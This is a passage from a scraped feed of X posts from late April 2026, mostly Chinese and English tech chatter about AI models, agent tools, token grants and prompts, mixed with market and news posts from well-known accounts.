"2026-04-29T08:43:53+00:00", "title": "R to @realNyarime: 虽然原帖并未提及中国联通,但帖主在评论区提到“联通玩不起”,也害怕被运营商“穿小鞋”因此仅披露运营商未经许可入室查设备,因小区监控不全面而无法取证", "url": "https://x.com/realNyarime/status/2049409325098238125"}, {"handle": "realNyarime", "name": "奶昔", "published_at": "2026-04-29T08:41:13+00:00", "title": "据xhs用户「A信通网络」爆料,长沙联通查PCDN,摸着窗户上的钥匙进门,前前后后来了10多个人,说是什么纪检组的和PCDN专案组的人,还有一堆智家工程师。\n\n原文如下:我们突然收到公司的电话,说我办的业务出问题了。还以为啥大事。我赶紧跑过来,发现客户家里的门开着,以为是客户自己在家里,结果客户并不在家。 [坏笑R]前前后后来了10多个人,说是什么纪检组的和PCDN专案组的人,还有一堆智家工程师。然后我和我们3个领导是最后来的。 客户场景是老小区-1楼一个房间里,拉了8条商务专线+1条商务专线带的二宽。\n那么,这个地方是否有问题呢?我认为是没问题的。因为", "url": "https://x.com/realNyarime/status/2049408651660755063"}, {"handle": "GoSailGlobal", "name": "Jason Zhu", "published_at": "2026-04-29T08:40:25+00:00", "title": "R to @GoSailGlobal: 3️⃣ 可以把做的张小龙Agent拉到群组\n\n大家可以圆桌讨论,简单易用", "url": "https://x.com/GoSailGlobal/status/2049408452079046944"}, {"handle": "GoSailGlobal", "name": "Jason Zhu", "published_at": "2026-04-29T08:40:22+00:00", "title": "R to @GoSailGlobal: 2️⃣ 每个agent可以GUI自定义大模型、skill、memory\n\n还可以支持第三方模型", "url": "https://x.com/GoSailGlobal/status/2049408436597899361"}, {"handle": "GoSailGlobal", "name": "Jason Zhu", "published_at": "2026-04-29T08:40:18+00:00", "title": "R to @GoSailGlobal: 1️⃣ 使用google邮箱登陆\n\n可下载本地软件(最好下载本地) or 网页版使用", "url": "https://x.com/GoSailGlobal/status/2049408421167005763"}, {"handle": "GoSailGlobal", "name": "Jason Zhu", "published_at": "2026-04-29T08:40:14+00:00", "title": "被一个二维码拉进了一个 IM 内测群\n\n群里坐着 Codex / Claude Code 实例、张小龙 agent,再加几个真人,大家一起讨论选题\n\nagent 先梳调性,再列大纲,真人在旁边补刀\n\n我做 AgentSkillsHub 看了 67,000+ 个 agent 项目,第一次见有人把 agent 当 IM 里的「一等公民」:不是 bot、不是插件,是好友名单里的成员\n\n它叫 Bloome(http://www.bloome.im),前 Kimi 核心 PM 做的\n\n现在秘密内测中,大家都在看 agent network 该长什么样:一群人,一群", "url": "https://x.com/GoSailGlobal/status/2049408403240571320"}, {"handle": "Pluvio9yte", "name": "雪踏乌云", "published_at": "2026-04-29T08:20:26+00:00", "title": "兄弟们,搞3D的直接冲🤩🤩🤩\n\nClaude上线了Blender MCP连接器,\n自然语言直接操控Blender的Python API,\n调场景、批量改物体、写自定义工具,不用会一行代码,\n\n我之前在Blender写个批量脚本至少折腾半小时,\n现在一句话就搞定了,\n\n更狠的是Anthropic同时砸钱加入了Blender基金会当赞助商,\n这波是总共9个创意工具连接器一起上线", "url": "https://x.com/Pluvio9yte/status/2049403423813140571"}, {"handle": "runes_leo", "name": "Leo", "published_at": "2026-04-29T08:16:00+00:00", "title": "刚学习完罗福莉老师这场 3.5h 访谈发了中文解读,\n转头就刷到她团队在送 100T tokens grant,立马提交申请。\n\n表单做得对中文 builder 极友好:\n工具栏 OpenClaw / Claude Code / Codex 排前三\n模型可勾 Claude / MiMo / DeepSeek / 豆包 / MiniMax 等国产\n\n下一步:把 MiMo V2.5 接进现有 Claude Code 工作流,\n做横向对照实测出公开内容。(如果申请成功的话😆)\n\n听 → 写 → 用 → 传播,一个闭环。\n\n申请入口:http://100t.xi", "url": "https://x.com/runes_leo/status/2049402305217241384"}, {"handle": "CuiMao", "name": "CuiMao", "published_at": "2026-04-29T07:55:14+00:00", "title": "Deepseek好像要发多模态的了,好好睁开眼睛看看这个世界吧!", "url": "https://x.com/CuiMao/status/2049397079177592925"}, {"handle": "CuiMao", "name": "CuiMao", "published_at": "2026-04-29T07:44:33+00:00", "title": "x.com/i/article/204921670329…", "url": "https://x.com/CuiMao/status/2049394392776290573"}, {"handle": "realNyarime", "name": "奶昔", "published_at": "2026-04-29T07:15:58+00:00", "title": "裤袜是裤子还是袜子?", "url": "https://x.com/realNyarime/status/2049387196311105556"}, {"handle": "CuiMao", "name": "CuiMao", "published_at": "2026-04-29T07:09:24+00:00", "title": "😄", "url": "https://x.com/CuiMao/status/2049385544577438121"}, {"handle": "CuiMao", "name": "CuiMao", "published_at": "2026-04-29T07:02:18+00:00", "title": "哈哈。主页刷到很多小朋友拿到了字节的 offer ,恭喜啊,我当时进字节的第一天,乌云遮天,大雨滂沱,电闪雷鸣,预示着一个伟大的产品经理即将孕育而生。😎😎,加油!,每天都是 Day 1", "url": "https://x.com/CuiMao/status/2049383757535490257"}, {"handle": "berryxia", "name": "Berryxia", "published_at": "2026-04-29T06:32:45+00:00", "title": "看别人天天发商单,还特么疯狂涨粉。\n\n难受了☹️ \n\n是时候,我也要让甲方爸爸来几个单了!\n\n助我一臂之力了嘿嘿😁\n\n在线等啊…", "url": "https://x.com/berryxia/status/2049376324444410138"}, {"handle": "elonmusk", "name": "Elon Musk", "published_at": "2026-04-29T06:19:31+00:00", "title": "Cybertruck", "url": "https://x.com/elonmusk/status/2049372990870290940"}, {"handle": "runes_leo", "name": "Leo", "published_at": "2026-04-29T06:15:09+00:00", "title": "x.com/i/article/204902031072…", "url": "https://x.com/runes_leo/status/2049371895267774715"}, {"handle": "elonmusk", "name": "Elon Musk", "published_at": "2026-04-29T06:05:35+00:00", "title": "Congrats!", "url": "https://x.com/elonmusk/status/2049369485459832951"}, {"handle": "CuiMao", "name": "CuiMao", "published_at": "2026-04-29T06:04:54+00:00", "title": "呵呵,上个月我说雷总的模型会把价格打下来,一群人喷我懂个 p 的 AI ,今天满屏都是感谢雷总,天地良心,成年人的世界真的他妈的太现实了吧。", "url": "https://x.com/CuiMao/status/2049369313547800804"}, {"handle": "elonmusk", "name": "Elon Musk", "published_at": "2026-04-29T06:04:42+00:00", "title": "RT by @elonmusk: Full circle moment: paying for @Starlink with @XMoney 🤝", "url": "https://x.com/elonmusk/status/2049369264914903143"}, {"handle": "lxfater", "name": "铁锤人", "published_at": "2026-04-29T06:02:06+00:00", "title": "用 GPT Image 2 赚钱,你想到几种方式?\n\n我整理了5种,每种都有提示词,拿走能用\n\n但还有一种方式不用自己会出图也能赚!!\n\n有人进货四分钱,卖两毛,自己一张图都不出\n\n闲鱼上已经有人在跑了\n\n其余 5 种看图\n\n完整提示词加自动化流程,请看引用文章👇", "url": "https://x.com/lxfater/status/2049368609193926810"}, {"handle": "naval", "name": "Naval Ravikant", "published_at": "2026-04-29T06:01:47+00:00", "title": "\"Savings Tax.\"", "url": "https://x.com/naval/status/2049368528445403351"}, {"handle": "elonmusk", "name": "Elon Musk", "published_at": "2026-04-29T05:57:10+00:00", "title": "RT by @elonmusk: Elon Musk on AI during the OpenAI trial:\n\n\"It (AI) could make us more prosperous, but it could also kill us all. We want to be in a Gene Roddenberry movie, like Star Trek, not so much a James Cameron movie, like Terminator.\n\nHe then elaborated by comparing AI tra", "url": "https://x.com/elonmusk/status/2049367366824305013"}, {"handle": "GoSailGlobal", "name": "Jason Zhu", "published_at": "2026-04-29T05:32:52+00:00", "title": "拼接两段 15s的忠犬八公动漫视频\n\n很不错哈", "url": "https://x.com/GoSailGlobal/status/2049361252804427850"}, {"handle": "GaryMarcus", "name": "Gary Marcus", "published_at": "2026-04-29T04:57:00+00:00", "title": "OpenAI may no longer be a nonprofit but it continues to be—and may always be—a “never made a profit”", "url": "https://x.com/GaryMarcus/status/2049352224547975422"}, {"handle": "chuxiaeth", "name": "初夏", "published_at": "2026-04-29T04:52:50+00:00", "title": "🧵 最近主攻各平台的嘴撸创作者赛道,不卷且能稳定产出收益。这波参与的是 @MindoAI 和 @useTria 的联合活动 🎯\n\n策略上我依然聚焦推文创作,辅以低磨损的轻交互。活动需要交易量和办卡,门槛确实比纯内容局高,但我不会去死磕资金堆量的维度,找准自己优势位最重要 📊\n\nTria交互链接:http://app.tria.so/?accessCode=3RPJYP7003&utm_source=mindo\n\n排名规则分三块:\n1️⃣ DEX 交易量\n2️⃣ 信用卡办理加消费\n3️⃣ 创作者影响力\n我的打法是主攻第三项,前两项用最小成本蹭基础分,集中火", "url": "https://x.com/chuxiaeth/status/2049351176433623539"}, {"handle": "naval", "name": "Naval Ravikant", "published_at": "2026-04-29T04:45:11+00:00", "title": "R to @naval: Apple: http://apple.co/4cF5VWZ\n\nSpotify: http://open.spotify.com/episode/5C1aTaJwlpkGC7Lj0cqDrx\n\nYouTube: http://youtu.be/hTdSU7q5WCo\n\nTranscript: http://nav.al/code\n\n—\n\nPresented by AngelList: http://angellist.com/podcast", "url": "https://x.com/naval/status/2049349252112089553"}, {"handle": "naval", "name": "Naval Ravikant", "published_at": "2026-04-29T04:45:10+00:00", "title": "New podcast on vibe coding - A Return to Code.\n\nA Return to Coding 00:20\n\nThe Personal App Store 03:17\n\nVibe Coding Is a Video Game with Real-World Rewards 06:22\n\nPure Software Is Uninvestable 10:33\n\nA Place for Each Model 14:22\n\nAI Is Eager to Please 17:57\n\nWhy Math and Coding? ", "url": "https://x.com/naval/status/2049349249905951175"}, {"handle": "Pluvio9yte", "name": "雪踏乌云", "published_at": "2026-04-29T04:39:21+00:00", "title": "未来属于设计 测评 和 运营", "url": "https://x.com/Pluvio9yte/status/2049347785456316549"}, {"handle": "GoSailGlobal", "name": "Jason Zhu", "published_at": "2026-04-29T04:07:44+00:00", "title": "Matt Pocock 的 Skill 框架 · 跟其他三家的差异\n\n项目链接:http://github.com/mattpocock/skills · 38K stars · MIT · 单人维护、日活更新\n\n一句话:把资深工程师的纪律装进 Claude Code,让 vibe coder 也能写出能上线的代码。\n\n含 16 个 skill:tdd / diagnose / improve-codebase-architecture / to-prd / to-issues / triage / grill-me / zoom-out / git-g", "url": "https://x.com/GoSailGlobal/status/2049339826877665496"}, {"handle": "GoSailGlobal", "name": "Jason Zhu", "published_at": "2026-04-29T03:53:48+00:00", "title": "x.com/i/article/204933030407…", "url": "https://x.com/GoSailGlobal/status/2049336319286063302"}, {"handle": "dingyi", "name": "Ding", "published_at": "2026-04-29T03:49:14+00:00", "title": "我就知道🤣🤣🤣", "url": "https://x.com/dingyi/status/2049335171066061234"}, {"handle": "paulg", "name": "Paul Graham", "published_at": "2026-04-29T03:42:31+00:00", "title": "RT by @paulg: MIT student asked a question earlier today that a lot of young founders are quietly wondering about:\n\n\"Won’t the frontier labs just do everything?\"\n\nYes it's true that OAI/Ant are shipping at incredible pace, but it's quite easy to avoid their blast radius and build", "url": "https://x.com/paulg/status/2049333482271260710"}, {"handle": "elonmusk", "name": "Elon Musk", "published_at": "2026-04-29T03:37:16+00:00", "title": "RT by @elonmusk: The exact same question to Grok 4.3, GPT 5.5, and Claude Opus 4.7:\n\n“Count to 10 starting from 11”\n\nGrok 4.3 wins 🏆\nEvery single time\n\nIt gave 11, 10 and explained why going backwards was the only logical move... The others started counting from 11 to 20\n\nGrok’s ", "url": "https://x.com/elonmusk/status/2049332159601942995"}, {"handle": "paulg", "name": "Paul Graham", "published_at": "2026-04-29T03:29:10+00:00", "title": "RT by @paulg: What do the smartest kids in the world do when they grow up?\n\nI did the largest study of ~18,000 International Olympiad medalists (IMO, IOI and IPhO) over the last 25yrs, arguably the sharpest analytical minds of the world in high school, to see where they ended up ", "url": "https://x.com/paulg/status/2049330123464393084"}, {"handle": "lxfater", "name": "铁锤人", "published_at": "2026-04-29T03:28:30+00:00", "title": "R to @lxfater: 海报图片提示词 :\n\n请生成一张随机的瑜伽宣传海报拼贴总图。\n整体要求:\n在一张大画面中,随机分隔出 N 张彼此独立的瑜伽宣传海报\n每张卡面尺寸随机设计铺满整张图\n卡面之间用清晰的留白、细边框、拼贴切割线或杂志式分隔结构隔开\n整体像一次抽出了 N 张不同风格的高质量瑜伽宣传海报\n每张海报都要明显不同,具有\"随机抽卡\"的新鲜感和丰富变化\n所有海报统一保持高级、专业、吸引人,适合瑜伽课程宣传、社媒推广、品牌视觉展示\n\n分镜摆姿势提示词:将图一的女性改为图二的4,5姿势,生成图片\n\n视频提示词:根据首尾帧生成丝滑的,就是专业瑜伽演", "url": "https://x.com/lxfater/status/2049329956153352499"}, {"handle": "lxfater", "name": "铁锤人", "published_at": "2026-04-29T03:28:29+00:00", "title": "R to @lxfater: 如何使用Agent 模式 3 步:\n\n选图像模式\n选GPT-2-image\n点 Agent 按钮\n\n利用下面给的提示词,出了分镜图和人设图\n\n接下来,利用分镜图和人设图,我们就可以控制人物动作啦!!\n\n如何做到呢?主要思路就是让摆出开始的瑜伽动作和结束的瑜伽动作(具体如图一所示)\n\n得出首帧和尾帧,直接喂给可灵视频模型,就出上面的视频了\n\n多个视频就可以出系列的瑜伽动作\n\nflowith的高级套餐包含 GPT Image 2 和 Nanobanana 2 flash 无限生成\n需要的可以使用下面链接,注册送积分:https:", "url": "https://x.com/lxfater/status/2049329950495310198"}, {"handle": "lxfater", "name": "铁锤人", "published_at": "2026-04-29T03:28:28+00:00", "title": "做内容运营,生图生视频,你现在还在跑好几个工具吗?\n\n被朋友拉去做瑜伽图,搭了无数工作流\nGPT Image 2 出来后,发现全废了\n\n得重新规划一套,但这几天身体不舒服,没心思搞\n随手把提示词扔进 flowith 试了一下\n\n以为偷懒的结果会很烂,但实际上这个是我最近用的最好的生图agent之一。\n\n它直接出了 12 个瑜伽动作分镜,动作清晰,描述完整\n\n分镜图和人物图来生成出首末两张图片,用视频模式可灵模型,简单的演示视频,一条链路打通,全在一个工具里面\n\nAgent 模式还能联网,生成下周海报日历,日期星期都是对的,普通的生图模型记忆估计2025年", "url": "https://x.com/lxfater/status/2049329944052859141"}, {"handle": "GoSailGlobal", "name": "Jason Zhu", "published_at": "2026-04-29T03:20:42+00:00", "title": "4/29 AI 圈速览\n\n• OpenAI 全系正式登陆 AWS:GPT + Codex + 托管 Agent 一并上线\n\n• Anthropic 拒接军方合作,Google 顺势签下五角大楼新合同\n\n• Claude Code 系统提示 Bug:托管 Agent 失效 + 用户 token 被空转烧光\n\n• mattpocock 开源个人 .claude Skills 目录:工程师级实战合集\n\n• Composio 发布 awesome-codex-skills:Codex 跨平台自动化即插即用\n\n• Lovable Vibe Coding 上线 iO", "url": "https://x.com/GoSailGlobal/status/2049327989951967546"}, {"handle": "GoSailGlobal", "name": "Jason Zhu", "published_at": "2026-04-29T03:20:09+00:00", "title": "🔥 今日新鲜 Skills 精选 Top 10(4月29日)\n由 http://agentskillshub.top 整理!发现 67000+ AI Agent 工具,每日更新 🚀\n\nMozilla 出手做统一 LLM 接口 + 跨领域 MCP 扩张,今日生态边界被拓得最宽!!!\n\n1️⃣ mozilla-ai/any-llm\n⭐ 1928 | +1928\nMozilla AI 出品——一个接口跟所有 LLM provider 通信,挑战 LiteLLM\n🔗 https://github.com/mozilla-ai/any-llm\n🌐 https://", "url": "https://x.com/GoSailGlobal/status/2049327853469310984"}, {"handle": "GaryMarcus", "name": "Gary Marcus", "published_at": "2026-04-29T03:10:50+00:00", "title": "RT by @GaryMarcus: Gary, that was a great article. Wonderful work as always sir. You have been proven accurate once again.", "url": "https://x.com/GaryMarcus/status/2049325506764677608"}, {"handle": "gkxspace", "name": "余温", "published_at": "2026-04-29T03:09:17+00:00", "title": "有做 摄影行业 的朋友吗,有个项目想聊一聊😊", "url": "https://x.com/gkxspace/status/2049325117998592311"}, {"handle": "realNyarime", "name": "奶昔", "published_at": "2026-04-29T02:54:33+00:00", "title": "RT by @realNyarime: 基于大家的评论,看来大家都想要 token,所以这次我打算这样庆祝。\n\n关注我 @aiandcloud 并转发 + 评论这条内容,5 月 8 日开奖, 送 $100 GPT-5.5 API token,有效期两个月。\n如果活动期间到了 2K fo,就再加一个 $200 的名额,万一到 3K 就加个 $300 的也行!\n\n感谢大家的支持!🥰", "url": "https://x.com/realNyarime/status/2049321411420811479"}, {"handle": "GaryMarcus", "name": "Gary Marcus", "published_at": "2026-04-29T02:53:39+00:00", "title": "the ability of this man to sell things he doesn’t believe in is truly extraordinary", "url": "https://x.com/GaryMarcus/status/2049321182089081059"}, {"handle": "realNyarime", "name": "奶昔", "published_at": "2026-04-29T02:39:00+00:00", "title": "好消息:沪爷可以去金马了\n坏消息:需要到福建的出入境办大通证(往来台湾通行证)和签注", "url": "https://x.com/realNyarime/status/2049317496361292240"}, {"handle": "sama", "name": "Sam Altman", "published_at": "2026-04-29T02:31:21+00:00", "title": "R to @sama: at this point @ajambrosino is mogmogging\n\nenjoy the next few updates", "url": "https://x.com/sama/status/2049315574120055054"}, {"handle": "sama", "name": "Sam Altman", "published_at": "2026-04-29T02:27:13+00:00", "title": "Image", "url": "https://x.com/sama/status/2049314532892475791"}, {"handle": "runes_leo", "name": "Leo", "published_at": "2026-04-29T02:16:00+00:00", "title": "群里讨论开源 bot,多数人共识就一句话:赚钱的 bot 没人会开源。\n\n听着像废话,但这个常识在 AI 时代变得尖锐——\n\n以前护城河是\"代码会写\"。现在 github 丢给 AI,几秒钟读完整个架构。重写成本从两个月变成两小时。\n\n护城河从\"代码会写\"变成\"策略会想\"。\n\n这件事我自己也在分层做——\n\npolymarket-toolkit 我开源(仓库https://github.com/runesleo/polymarket-toolkit),它解决的是数据采集、API 调用这类工具层的事。复用价值大,门槛低,开源等于做品牌。\n\nH 系列做市/ta", "url": "https://x.com/runes_leo/status/2049311708330459226"}, {"handle": "GoSailGlobal", "name": "Jason Zhu", "published_at": "2026-04-29T01:58:03+00:00", "title": "说个冷知识\n\n云服务厂商还是很有投资眼光的\n\n原价或者加价买了H100,现在还能卖那个价,甚至更高\n\n另外他还能出租5年保修期内的机器\n\n这不妥妥当下最具价值的投资品类嘛", "url": "https://x.com/GoSailGlobal/status/2049307192692781200"}, {"handle": "charliebilello", "name": "Charlie Bilello", "published_at": "2026-04-29T01:56:48+00:00", "title": "R to @charliebilello: x.com/charliebilello/status/…", "url": "https://x.com/charliebilello/status/2049306875301130507"}, {"handle": "elonmusk", "name": "Elon Musk", "published_at": "2026-04-29T01:55:58+00:00", "title": "RT by @elonmusk: #BREAKING: Chairman @Jim_Jordan invites Southern Poverty Law Center Interim CEO and President Bryan Fair to testify publicly on Wednesday, May 20, 2026, at 10:00 a.m.", "url": "https://x.com/elonmusk/status/2049306669352358192"}, {"handle": "charliebilello", "name": "Charlie Bilello", "published_at": "2026-04-29T01:55:13+00:00", "title": "US home prices increased 0.7% over the last year, the slowest growth rate since June 2023. There are currently a record 46% more sellers than buyers nationally. Absent manipulation from the Federal Government/Reserve, prices will come down and homes will become more affordable.", "url": "https://x.com/charliebilello/status/2049306480071873011"}, {"handle": "dingyi", "name": "Ding", "published_at": "2026-04-29T01:47:21+00:00", "title": "Ghostty 离开 GitHub,同一天 Warp 宣布开源。\n\nWarp 一直以来都很好用,但越来越臃肿,性能也差点意思,但对不会命令行的非程序员非常友好,这次开源可以说是一个重大转折点,没准半年后各种 Warp 变体都会出现了。\n\n还有,Warp 现在的垂直 tab 就比基于 Ghostty 的那些 Cmux 好用多了,期待未来出现更多好用的终端!", "url": "https://x.com/dingyi/status/2049304499093946475"}, {"handle": "gkxspace", "name": "余温", "published_at": "2026-04-29T01:38:07+00:00", "title": "R to @gkxspace: 大家的重点不应该放在“六个月”、“不需要人”\n\n技术的迭代速度很快,现在可以10个人变成5个,或许六个月、也或许一年后可能变成1个,直到完全不需要人来做各种重复性工作\n\n更应该关注的是找到自身的价值,在这波AI浪潮里有属于自己的独特性", "url": "https://x.com/gkxspace/status/2049302176900501544"}, {"handle": "HarryStebbings", "name": "Harry Stebbings", "published_at": "2026-04-29T01:24:00+00:00", "title": "\"SBC becomes a problem when stock prices fall and dilution explodes.\n\nWhat was 3% annual dilution can quickly become 10%, creating a downward spiral that is hard to escape.\n\nThe fix is to be far more selective, give equity to the top performers who drive value, and pay the rest i", "url": "https://x.com/HarryStebbings/status/2049298621951058341"}, {"handle": "charliebilello", "name": "Charlie Bilello", "published_at": "2026-04-29T01:23:28+00:00", "title": "RT by @charliebilello: Since the start of the Iran war...\nJet Fuel: +70%\nSulfur: +60%\nBrent Crude Oil: +52%\nHeating Oil: +52%\nWTI Crude Oil: +48%\nUrea: +48%\nDiesel: +45%\nGasoline: +40%\nEuropean Nat Gas: +36%\nFertilizer: +23%\nPalm Oil: +12%\nCoal: +11%\nWheat: +10%\nIron Ore: +8%\nS&P", "url": "https://x.com/charliebilello/status/2049298490489004357"}, {"handle": "GoSailGlobal", "name": "Jason Zhu", "published_at": "2026-04-29T01:22:14+00:00", "title": "RT by @GoSailGlobal: 我和张凯的GEO论文,在全球最大的论文平台http://arxiv.org完成审核并正式发布\n这应该是全球第二篇与GEO有关的专项论文\n\n论文基于今年3月份最新的数据,包括602条 Prompt、21143 条引用、23745条AI抓取记录,最终形成的一版正式的GEO专项研究报告,欢迎查阅\n\n如果对大家能有帮助,我们打算后面继续抓取更多的数据,进行专项研究并开放研究成果\n\n网页地址:https://arxiv.org/abs/2604.25707\n论文PDF:https://arxiv.org/pdf/2604.", "url": "https://x.com/GoSailGlobal/status/2049298176935690588"}, {"handle": "Pluvio9yte", "name": "雪踏乌云", "published_at": "2026-04-29T01:17:10+00:00", "title": "搭配收集免费模型的开源项目 使用这篇文章更佳\n\nhttps://github.com/cheahjs/free-llm-api-resources", "url": "https://x.com/Pluvio9yte/status/2049296905382035945"}, {"handle": "elonmusk", "name": "Elon Musk", "published_at": "2026-04-29T01:16:51+00:00", "title": "RT by @elonmusk: Following future rollout of FSD V14 Lite for HW3 vehicles in the US, we plan on expanding V14 Lite to additional international markets.\n\nThis update ensures that HW3 vehicle owners will continue to benefit from ongoing software updates.\n\nSince international rollo", "url": "https://x.com/elonmusk/status/2049296822162874685"}, {"handle": "realNyarime", "name": "奶昔", "published_at": "2026-04-29T01:15:23+00:00", "title": "昨天试着申请了小米百万亿Token补贴,也收到了雷总送的7亿token,有效期一个月\n支持OpenAI和Anthropic端点,也有提供Claude Code等AI软件接入文档,看得出MiMo团队很用心在做这个事情\n\n接下来一个月,我会用MiMo V2.5对接OpenClaw尝试Vibe一个项目并开源,也期待国产LLM越做越好!", "url": "https://x.com/realNyarime/status/2049296454905393361"}, {"handle": "jason", "name": "Jason Calacanis", "published_at": "2026-04-29T01:07:12+00:00", "title": "Big Zesty 💪", "url": "https://x.com/jason/status/2049294394075849059"}, {"handle": "Pluvio9yte", "name": "雪踏乌云", "published_at": "2026-04-29T01:02:14+00:00", "title": "x.com/i/article/204914647001…", "url": "https://x.com/Pluvio9yte/status/2049293145670836459"}, {"handle": "svwang1", "name": "王川(硅谷)", "published_at": "2026-04-29T00:48:58+00:00", "title": "旧金山湾区的地铁站花了九千万美元在入口处加了高高的门,这样逃票变得非常困难。不仅每年增加了一千万美元收入,而且地铁变得更加干净安全,之前要做的各种清理工作减少了 95%。\n\n和外界交往的过程中,增加各种严格的过滤筛选机制,是保护自己,提高效率的一个重要必备的措施。因为成本的原因而对外不设防,就是准备把自己变成垃圾场。", "url": "https://x.com/svwang1/status/2049289806241550791"}, {"handle": "elonmusk", "name": "Elon Musk", "published_at": "2026-04-29T00:23:52+00:00", "title": "RT by @elonmusk: Ookla says @Starlink has been a game-changer for inflight Wi-Fi speeds. Their new report ranks which airline has the fastest Wi-Fi:\n\n\"Starlink stood out for its speed. Of over 50 airlines evaluated, the eight airlines that exceeded 100 Mbps median download speed ", "url": "https://x.com/elonmusk/status/2049283488600277368"}, {"handle": "elonmusk", "name": "Elon Musk", "published_at": "2026-04-29T00:09:36+00:00", "title": "RT by @elonmusk: Super high bandwidth to commercial aircraft with @Starlink", "url": "https://x.com/elonmusk/status/2049279898976702535"}, {"handle": "jason", "name": "Jason Calacanis", "published_at": "2026-04-29T00:05:58+00:00", "title": "Oh lordy... here comes the lawfare madness again 🤦\n\n86 when I grew up in the restaurant business meant “to get rid of” something (ie “86 clams” meant to take clams off the menu). \n\nI was told it had two origins:\n\n1. 86 Chumley's, which was the address of the speakeasy in Manhatta", "url": "https://x.com/jason/status/2049278984513310783"}, {"handle": "lxfater", "name": "铁锤人", "published_at": "2026-04-29T00:05:46+00:00", "title": "看来草莓问题和洗车问题很经典了,ChatGPT都在测试", "url": "https://x.com/lxfater/status/2049278935897186512"}, {"handle": "HarryStebbings", "name": "Harry Stebbings", "published_at": "2026-04-29T00:05:00+00:00", "title": "\"No, layoffs alone will not fix the problem.\n\nIf a company has become bloated, simply cutting 50% often just leaves you with half the same mediocrity.\n\nThe real issue is culture and talent quality, and fixing that usually requires a full rebuild, which is extremely hard, especial", "url": "https://x.com/HarryStebbings/status/2049278741583643076"}, {"handle": "jason", "name": "Jason Calacanis", "published_at": "2026-04-28T23:51:30+00:00", "title": "Not investment advice…. but WERE AT A FOUR YEAR HIGH AND WE CRUSHED EARNINGS 😂😂🤦😂😂\n\nNever change Philly!!!", "url": "https://x.com/jason/status/2049275346109796388"}, {"handle": "berryxia", "name": "Berryxia", "published_at": "2026-04-28T23:51:17+00:00", "title": "Google Gemma 官方教你本地跑 Coding Agent!\n\n本地完美组合来了:\n• Pi Agent\n• Gemma 4 26B 模型\n• LM Studio / Ollama / llama.cpp 等 serving engine\n\n完全离线运行、零 API 费用、100% 隐私保护、零延迟!本地开发者 Agentic 开发神器!\n\n附 @patloeber 详细一步步搭建教程👇\nhttps://patloeber.com/gemma-4-pi-agent/", "url": "https://x.com/berryxia/status/2049275291164692726"}, {"handle": "jason", "name": "Jason Calacanis", "published_at": "2026-04-28T23:50:25+00:00", "title": "Lock in, GAME FIVE, @knicks fam!\n\n@BenStiller @jalenbrunson1 @Arifromanhattan \"\">@CPTheFanchise @jerryferrara @MrChuckD\n@RealChalamet @fredwilson @msavino\n@JDSportsTalkNY @nihalmehta @WorldWideWob\n@BillSimmons😂@JesseItzler @ajv 📷 @duglust @ischafer @sirgutz @Traticaster101 \n\nHow", "url": "https://x.com/jason/status/2049275070800150851"}, {"handle": "berryxia", "name": "Berryxia", "published_at": "2026-04-28T23:46:25+00:00", "title": "🚀 OpenBMB 重磅发布!MiniCPM-o 4.5 技术报告来了!\n\n9B 参数多模态模型实现突破性实时交互:\n\n• Omni-Flow 框架:原生全双工流式交互(视频+音频+文本毫秒级同步)\n\n• Native Full-Duplex + Proactive Interaction(无需VAD,可主动提醒)\n\n• 多模态基准接近 Gemini 2.5 Flash(MMBench 87.6 / MathVista 80.1)\n\n• 极致 Edge AI:完全离线运行,一键安装 Windows / macOS(12G VRAM 即可)\n\n• 100%", "url": "https://x.com/berryxia/status/2049274065610027362"}, {"handle": "runes_leo", "name": "Leo", "published_at": "2026-04-28T23:38:00+00:00", "title": "之前一直没搞清楚 GitHub 通知是怎么工作的。Star / Watch 各档到底推什么?摸清楚才发现很多人(包括我)一直在误解:star 根本不触发通知。\n\n- Star ⭐ = 书签,零通知\n- Watch (All Activity) = issue / PR / release / discussion / commit 评论,但单纯 push 不推\n- Watch (Releases only) = 只有打 tag 发 release 才推\n\n所以 star 在机制层就是个公开的\"值得存一下\"标签,不是订阅、不反映使用、甚至不代表看过。每次 ", "url": "https://x.com/runes_leo/status/2049271946022474215"}, {"handle": "dingyi", "name": "Ding", "published_at": "2026-04-28T22:59:18+00:00", "title": "我去有人知道这是哪位大神设计的吗?@FateTell 应该是今年看到的设计最精美又好玩的 iOS app 了 !算命 + AI 结合很有创意,细节打磨的也相当好。哪怕你对八字之前不感兴趣,我也建议下载一个把玩一下。看多了千篇一律 vibe 的产品,突然看到这个真的让人眼前一亮啊。\n\nhttps://fatetell.com/zh-CN/invite?referral=QQE5QT", "url": "https://x.com/dingyi/status/2049262208241332358"}, {"handle": "berryxia", "name": "Berryxia", "published_at": "2026-04-28T22:51:25+00:00", "title": "R to @berryxia: GitHub:https://github.com/harflabs/SwiftVLC\n\n```", "url": "https://x.com/berryxia/status/2049260222863266206"}, {"handle": "berryxia", "name": "Berryxia", "published_at": "2026-04-28T22:51:22+00:00", "title": "这个老哥 写的SwiftVLC 正式开源啦!🔥\n\n现代 Swift 6 对 libVLC 的高质量 wrapper(驱动 Tilfaz 应用):\n\n• 直接 C bindings,无 Objective-C 桥接 \n• 严格并发支持(Strict Concurrency) \n• 专为 SwiftUI 量身打造 \n• 支持 iOS、macOS、tvOS、Mac Catalyst \n\n附带完整 Showcase App(40 个案例)和详细 DocC 文档!", "url": "https://x.com/berryxia/status/2049260211895185445"}, {"handle": "berryxia", "name": "Berryxia", "published_at": "2026-04-28T22:48:37+00:00", "title": "GPT2 真的成精了!的确!\n小小东老哥整的这套提示词很不错,推荐大家!", "url": "https://x.com/berryxia/status/2049259518027276559"}, {"handle": "elonmusk", "name": "Elon Musk", "published_at": "2026-04-28T22:48:24+00:00", "title": "RT by @elonmusk: The California Coastal Commission has issued a formal apology to @elonmusk and SpaceX, adding that it will not consider political views or speech in future regulatory decisions.\n\n• The Commission admits some officials made politically biased and improper statemen", "url": "https://x.com/elonmusk/status/2049259466973933764"}, {"handle": "berryxia", "name": "Berryxia", "published_at": "2026-04-28T22:31:31+00:00", "title": "3D 网格生成重磅突破!SATO 来了!\n\n• 从点云(Point Clouds)直接生成完整网格 \n• Strip-based tokenization,实现超干净边缘流与结构 \n• 原生 UV segmentation 直接 baked into 生成过程 \n• 单个模型同时支持三角网格 + 四边形网格", "url": "https://x.com/berryxia/status/2049255217603178794"}, {"handle": "jason", "name": "Jason Calacanis", "published_at": "2026-04-28T22:28:53+00:00", "title": "If this passes, what impact (if any) do you think @RoKhanna’s $25 minimum wage will have on unemployment rate in California? \n\nShow your work.", "url": "https://x.com/jason/status/2049254554550653047"}, {"handle": "berryxia", "name": "Berryxia", "published_at": 